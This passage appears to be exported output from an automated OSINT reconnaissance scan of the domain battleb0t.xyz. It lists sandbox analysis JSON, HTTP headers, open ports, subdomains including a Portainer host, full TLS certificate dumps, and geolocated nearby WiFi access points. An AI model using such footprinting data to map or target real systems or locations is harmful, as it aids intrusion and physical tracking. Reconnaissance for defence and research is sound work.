clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/70 Antivirus vendors marked sample as malicious (0% detection rate)'}], u'threat_level': 0, u'size': None, u'job_id': u'63f84e0cf084a4ebbd09e40f', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'185.199.110.153'], u'sha256': u'f8d347492a1f6c9b93dc2f32787a5f977924a39f1b3b780e41308e2da9cde63e', u'sha512': u'2a79b0f20b074cf0ee05cae5de8129f8e82728b59771926ef761f5db4c7972c16b093a38e08ce49a784934174b18c7b66aadf02caef3d81f3be87dacb6012134', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://ovolve.github.io./', u'submission_id': u'63f84e0df084a4ebbd09e410', u'created_at': u'2023-02-24T05:41:33+00:00', u'filename': None}], u'analysis_start_time': u'2023-02-24T05:41:33+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 8, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'190362034693d3992c7a6e770f7f7b1f', u'network_mode': u'default', u'processes': [], u'sha1': u'a14c41f95cb25b4fba550658bd8036aa7eb96164', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 32 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [u'ovolve.github.io', u'ovolve.github.io.'], u'extracted_files': [], u'type_short': []}] | 185.199.110.153 |
| 2023-05-12 03:03:20 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-l.github.io |
| 2023-05-12 02:54:48 | BGP AS Membership | No | Censys | 0 | 0 | 3 | 0 | None | 396982 | 34.148.97.127 |
| 2023-05-12 02:54:23 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None | text/css | https://www.ayhu.xyz/cdn-cgi/styles/challenges.css |
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["7c5ddd7eab1d10af-ORD"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 188.114.97.1 |
| 2023-05-12 03:28:06 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.144:80 | 188.114.96.0/24 |
| 2023-05-12 02:54:38 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 253
Connection: close
CF-RAY: -
| 172.67.168.252 |
| 2023-05-12 02:44:32 | Affiliate - Internet Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | cdn-185-199-110-153.github.com | 185.199.110.153 |
| 2023-05-12 02:44:39 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | portainer.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:d5:98:ae:2a:84:a2:19:ac:80:9a:6c:74:76:20:f8:3f:d8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:01 2022 GMT
Not After : Feb 15 09:44:00 2023 GMT
Subject: CN=portainer.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c0:b5:e1:c5:d7:75:db:34:03:18:a1:ee:7b:4b:
ea:8e:e7:69:4e:39:85:68:38:67:3d:c1:9a:8b:f3:
bd:cf:17:bb:68:6a:65:cf:4a:a8:76:23:7a:4f:20:
df:84:d1:79:b9:6a:69:1e:44:79:b1:f5:77:a0:d1:
57:7d:30:22:17:73:4d:12:ae:da:6f:17:2f:cc:59:
fc:28:b2:56:e2:d1:04:1e:a5:af:0c:cc:00:03:c9:
be:8b:f2:e1:2a:f3:ee:60:20:15:0b:48:ba:bd:47:
ee:af:b8:94:3e:d3:00:b1:a7:9d:eb:e0:5f:7e:6f:
9e:2f:c5:a5:c8:f8:87:92:71:43:69:60:10:5d:de:
5f:ef:16:13:44:c8:38:e1:ab:bf:d4:ba:c9:63:0e:
71:cd:82:05:39:b6:2b:c7:09:a0:3f:7a:0f:d1:b5:
8c:31:e1:64:fb:3e:7d:9c:f0:15:49:3c:98:f1:98:
8a:de:cb:a1:c8:6f:57:47:ea:69:8f:65:04:e8:bd:
1e:d7:20:58:d9:de:ea:65:82:25:f4:8a:20:52:90:
c5:c4:e3:bf:c3:af:cc:ca:46:be:71:d3:24:c0:85:
69:56:27:39:94:2d:43:65:9d:2f:bb:4d:62:7e:14:
0c:45:91:3c:ec:e1:a2:ae:81:70:73:3d:8e:8c:ef:
5a:48:f8:f8:b4:3f:a5:4e:ca:0b:38:80:5d:df:42:
eb:06:32:21:0b:67:44:bf:df:2c:ae:bd:f6:68:1d:
b6:39:c5:d8:57:bc:5e:76:f0:ee:ab:21:2d:35:69:
74:8a:c4:88:bd:d0:3d:91:05:d0:dd:4e:54:8e:e9:
94:fd:a6:9c:7c:35:94:f3:2c:a0:e6:0f:6f:ec:d7:
06:e0:96:b5:94:ae:64:fd:f9:52:45:cc:c0:54:2c:
ae:a7:51:2d:fb:3c:d9:4c:eb:d6:b7:fe:7c:8d:68:
1d:87:d4:dc:09:38:2e:ee:0d:49:32:4c:2b:08:20:
ff:a0:95:02:0a:01:3f:99:e9:bb:d2:97:db:d5:f5:
7d:97:14:d0:18:c5:3f:cf:31:7b:a7:9c:bf:9d:b3:
23:66:83:9e:eb:d9:48:01:38:6c:db:2f:7b:2d:82:
d4:36:d7:86:9f:0b:de:ef:ab:c4:7c:aa:36:24:d0:
9f:9a:47:7a:a3:aa:26:bd:ef:52:90:60:1c:7e:d9:
0d:dc:f1:5b:cb:c0:7c:8b:f6:64:bf:41:76:8c:ba:
34:64:15:cb:49:b9:40:f8:78:ff:c5:eb:99:a1:af:
b3:7a:cb:c9:d0:b9:1b:1a:3d:ef:4c:68:86:22:46:
99:75:81:d3:cf:5c:90:1a:2f:01:4f:59:01:34:82:
5c:f7:3f
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
6D:D8:A8:24:70:8B:8F:0C:4D:0C:6C:1A:D9:1A:9A:75:25:E5:1A:12
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:portainer.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Nov 17 10:44:01.511 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:BA:66:A9:AA:5E:0F:A6:67:BA:ED:61:
B9:4A:97:4F:0B:86:A7:57:50:55:B9:A5:69:1B:DC:7C:
65:C9:5B:E4:5B:02:20:6A:38:79:69:94:85:41:86:C0:
4E:33:F0:44:69:54:C5:A9:40:ED:85:BC:5D:66:70:B8:
31:1F:C8:D3:58:B2:89
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Nov 17 10:44:01.990 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D7:1B:E9:32:CF:B7:9A:93:B2:BF:77:
63:D5:5A:7F:F4:A0:6C:77:51:03:FE:F1:5C:A7:51:2C:
16:22:63:24:9A:02:21:00:E1:61:68:D5:A1:EE:9A:2E:
9E:AF:84:50:74:9E:B6:EB:55:A1:CA:4D:CE:91:07:8D:
31:2D:F6:05:41:96:C7:BF
Signature Algorithm: sha256WithRSAEncryption
a4:99:cc:17:c2:9a:8e:12:57:4b:5f:f3:9f:2c:de:1e:67:a2:
15:f4:c2:a6:9a:37:ce:60:60:9f:eb:7b:4e:d1:f5:56:0a:77:
87:4d:62:42:b9:af:17:7b:da:58:7a:6f:13:64:15:09:4e:90:
23:78:51:46:b5:fd:d4:cc:83:1e:ee:91:6d:c6:56:93:07:ae:
30:b8:d8:e6:ea:e5:86:c8:36:d3:3f:ac:2f:8b:df:14:86:08:
eb:08:79:b4:e2:b8:85:a4:15:71:51:85:18:65:cb:a8:ed:92:
eb:f7:89:15:96:1f:f7:d9:1c:15:d2:aa:fd:8f:7f:2f:0c:fa:
5e:72:7c:3c:89:e8:0c:5a:70:50:ef:1f:1d:93:9d:0a:a2:65:
6b:bc:f9:07:8e:3b:f7:ed:d5:4c:37:b1:48:2b:7b:c8:b0:02:
1d:3a:a2:c7:65:6c:2d:5a:92:f1:fd:51:00:e1:4b:ac:78:1f:
32:ae:7e:03:f4:0b:1f:cf:e7:b2:0f:1e:53:51:4d:d4:41:52:
82:77:57:35:05:af:16:cf:55:87:95:55:14:cd:4c:80:d7:09:
00:5e:46:ac:87:47:23:25:66:0a:6d:de:61:87:1a:7b:22:b8:
5a:2a:93:d2:ac:83:ea:40:df:11:e8:22:85:ab:f2:84:66:88:
cc:de:a7:8a
|
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | myLGNet (Net ID: 00:01:36:26:A1:14) | 50.1188, 8.6843 |
| 2023-05-12 03:00:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.3): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | logitec-a53c1d (Net ID: 00:01:8E:A5:3C:1C) | 50.1188, 8.6843 |
| 2023-05-12 02:55:56 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://bit.ly/3gxx5yk', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_ec8_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_ec8_ConnHashTable<3784>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_ec8_IESQMMUTEX_0_519"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_ec8_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3784"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_ec8_IE_EarlyTabStart_0xc6c_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_ec8_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"3.94.37.140:443"\n "3.5.21.21:443"\n "104.196.30.220:443"\n "104.16.123.175:443"\n "54.147.12.123:443"\n "23.36.63.240:443"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /resources/6d548268b2fe4c93b1b74262c8515b07?shared HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /resources/6d548268b2fe4c93b1b74262c8515b07?shared HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /main.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /main.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /standard.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /standard.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/client-config HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/client-config HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/feature-flags HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/feature-flags HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/resources/6d548268b2fe4c93b1b74262c8515b07/reviews HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/resources/6d548268b2fe4c93b1b74262c8515b07/reviews HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/licenses HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/licenses HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/resources/6d548268b2fe4c93b1b74262c8515b07 HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/resources/6d548268b2fe4c93b1b74262c8515b07 HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "D2684IUR.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\D2684IUR.txt]- [target | 104.196.30.220 |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:91:08:65:b4:56:94:e3:89:37:6b:c8:ee:5a:fc:f4:80:52
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 24 03:05:11 2023 GMT
Not After : May 25 03:05:10 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:97:4b:9a:94:33:ae:7c:5e:91:1b:d8:54:22:c9:
ed:4f:8d:dc:1c:ea:82:e7:c1:66:b8:0e:7a:d7:69:
7e:97:11:2c:1a:a5:0e:64:16:12:d5:94:b3:23:f2:
36:d4:4f:eb:d5:32:50:ac:e4:d7:66:1b:e3:da:91:
79:04:66:f4:2d:fa:3e:45:f4:48:91:1a:8d:80:82:
ca:dd:66:18:cd:f2:9d:87:0d:96:09:36:f0:90:50:
74:b3:8f:d1:d4:ab:e5:3c:ba:a6:ad:57:62:22:2b:
60:de:6e:76:04:02:5d:fa:52:80:b7:61:6b:ca:89:
0e:51:38:c3:f2:4d:c1:8f:3e:5c:2f:86:ec:7a:ee:
c4:a9:09:67:fe:3a:36:2c:f4:71:dd:63:52:c7:7e:
24:13:3b:f8:64:ac:0f:17:65:8b:4f:12:db:ba:8b:
96:d7:a7:d3:5c:fd:8f:e9:26:b0:c1:d3:ce:ae:a4:
80:9b:8d:9b:1f:f6:ca:4a:88:4f:be:ed:28:2f:45:
12:8d:ed:28:4a:e1:d7:0a:d1:cc:4f:38:0f:fa:93:
2d:8d:4a:92:3a:88:82:01:24:a7:62:52:95:88:cb:
f5:21:eb:4e:1f:14:59:fb:a0:f3:53:6c:6e:20:e1:
ca:0b:83:46:36:34:c6:22:17:1b:d8:e6:82:24:68:
ca:65
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D5:29:D7:46:02:65:73:65:FC:F5:A7:7C:2E:6F:96:79:D8:67:A4:E6
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Feb 24 04:05:12.050 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:25:A0:69:FB:7F:3E:63:7D:A0:82:F0:BD:
99:FA:FF:84:20:AF:C5:86:81:24:4B:F7:CB:AB:FB:5E:
BD:6B:87:56:02:21:00:8A:56:44:28:2B:0B:E5:D6:3A:
F4:15:7E:0A:3C:BA:80:47:38:D3:13:65:D6:8E:A8:E5:
01:04:D3:ED:D7:28:24
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Feb 24 04:05:12.068 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:48:50:77:27:A7:8D:E9:4E:44:5B:E4:B4:
56:50:FB:20:FC:C8:FD:0F:4B:DC:68:08:A4:56:A5:4B:
F5:A5:47:B3:02:20:41:B4:A0:0F:22:1C:69:E8:F3:FB:
60:B2:81:61:62:E0:DD:28:37:13:7E:74:2B:26:74:E1:
FD:E5:4D:29:61:E7
Signature Algorithm: sha256WithRSAEncryption
61:b4:ef:73:fc:3c:d6:36:f5:75:80:0c:33:8b:9a:05:0b:c4:
ef:72:1d:69:74:95:fd:0a:84:bd:b8:b9:3c:12:87:d3:eb:2d:
b5:d2:63:2a:29:60:59:c4:11:1c:0f:c3:fb:79:2f:8a:43:57:
38:62:d8:2e:68:34:bb:6c:0e:7a:e3:f8:3d:f5:c1:05:a5:6d:
93:b9:b3:48:22:8e:a3:39:66:e6:a5:9e:dc:e2:98:35:7e:b3:
e1:c7:b2:16:b7:b0:2e:70:50:4e:ea:93:d0:f8:5c:69:6c:1b:
d2:3e:ee:da:64:1f:ad:97:c8:be:17:38:a6:ed:92:9e:3b:db:
67:c8:b0:5f:e6:af:fd:f7:57:92:7b:87:3d:bf:c4:c1:21:13:
ba:c4:d8:85:a3:63:dc:90:ee:df:3d:2a:bc:03:4e:ba:1b:8c:
0c:16:7e:58:e3:ac:7f:dc:3b:40:18:1f:74:98:d5:c4:fa:32:
99:95:a0:64:1e:5b:4d:a8:f5:79:33:2e:3f:43:dc:8d:0e:7d:
28:25:74:7a:93:27:53:2e:6b:ae:4d:81:c1:3c:e0:cd:42:02:
6d:fc:da:f3:52:57:d5:b1:70:8e:1a:91:15:c8:1b:93:cd:40:
b8:ff:29:e7:c6:05:ad:63:8c:c8:ec:d7:e9:88:33:a3:5d:43:
a1:d5:b9:20
| battleb0t.xyz |
